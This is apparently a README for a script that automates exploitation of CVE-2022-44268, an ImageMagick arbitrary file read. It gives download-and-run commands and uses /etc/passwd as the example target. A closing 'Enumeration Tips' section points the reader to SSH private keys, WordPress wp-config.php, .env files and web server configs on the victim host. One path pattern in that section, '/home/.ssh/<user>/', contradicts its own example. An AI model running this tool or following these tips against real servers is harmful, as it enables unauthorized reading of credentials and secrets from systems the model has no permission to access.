## https://sploitus.com/exploit?id=60E6E92B-747C-5C62-B2AD-9190E5F77196
# auto-cve-2022-44268
![banner.png](banner.png)
Automating exploitation of CVE-2022-44268 ImageMagick Arbitrary File Read
Original finding: https://www.metabaseq.com/imagemagick-zero-days/
PoC Repository: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
# Description
ImageMagick will **interpret** the "profile" text string** as a filename** and **will load the content** as a raw profile, then **the attacker can download** the resized image **which will come with the content of a remote file.**
## Vulnerability & Exploitation summary
๐ด Take a PNG file, add a file path to the "profile" EXIF field, send it to a website using an affected version of ImageMagick, it interprets the file path, load its content into the EXIF field, you download the image, extract the HEX data in the "Raw Profile Type" field, and convert it to ASCII to read the remote file.
Affected versions: ImageMagick 7.1.0-49
# Requirements
```bash
sudo apt install pngcrush imagemagick exiftool exiv2 -y
```
# Usage
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/auto-cve-2022-44268.sh
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/flag.png
chmod +x auto-cve-2022-44268.sh
./auto-cve-2022-44268.sh <image name> <file to read>
# Example
./auto-cve-2022-44268.sh flag.png /etc/passwd
# Demo
https://github.com/narekkay/autoexploit-cve-2022-44268/assets/24856100/cd5719e5-6eae-4544-b4dc-719b1182018d
# Enumeration Tips
Once you get users from /etc/passwd, try to enumerate SSH private keys from /home/.ssh/<user>/ :
- id_rsa
- id_ecdsa
- id_ed25519
e.g /home/john/.ssh/id_ed25519
Don't forget :
- config files for known CMS like wp-config.php for Wordpress
- Virtual Hosts enumeration like /etc/apache2/sites-available/000-default.conf,
- or .env files for instances
### Tags
imagemagick, exploit, vuln, magick convert, magick resize, exploitation, vulnerabilities, file read, CVE-2022-44268